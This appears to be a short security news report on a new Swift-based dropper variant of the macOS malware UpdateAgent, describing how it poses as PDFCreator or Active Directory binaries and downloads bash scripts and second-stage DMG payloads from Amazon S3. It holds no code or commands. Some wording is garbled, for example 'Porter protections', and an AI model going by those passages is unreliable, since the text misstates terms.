UpdateAgent returns with new macOS malware dropper written in Swift

A new variant of the macOS malware tracked as UpdateAgent was spotted in the wild, indicating continued attempts by its authors to upgrade its functionality.

“Perhaps one of the most identifiable features of the malware is that it relies on AWS infrastructure to host its various payloads and perform its infection status updates on the server,” wrote said researchers at Jamf Threat Labs. mentioned in a report.

UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, making it easier to distribute second-stage payloads like adware while bypassing macOS. Porter protections.

Newly discovered Swift-based dropper impersonates Mach-O binaries named “PDFCreator” and “Active Directory” which, when executed, establishes a connection to a remote server and retrieves a bash script to run.

cyber security

“The main difference [between the two executables] is that it navigates to a different URL from which to load a bash script,” the researchers noted.

These bash scripts, named “activedirect.sh” or “bash_qolveevgclr.sh“, include a URL pointing to Amazon S3 buckets to download and run a second stage disk image (DMG) file on the compromised endpoint.

“The continued development of this malware shows that its authors remain active, trying to reach as many users as possible,” the researchers said.

Comments are closed.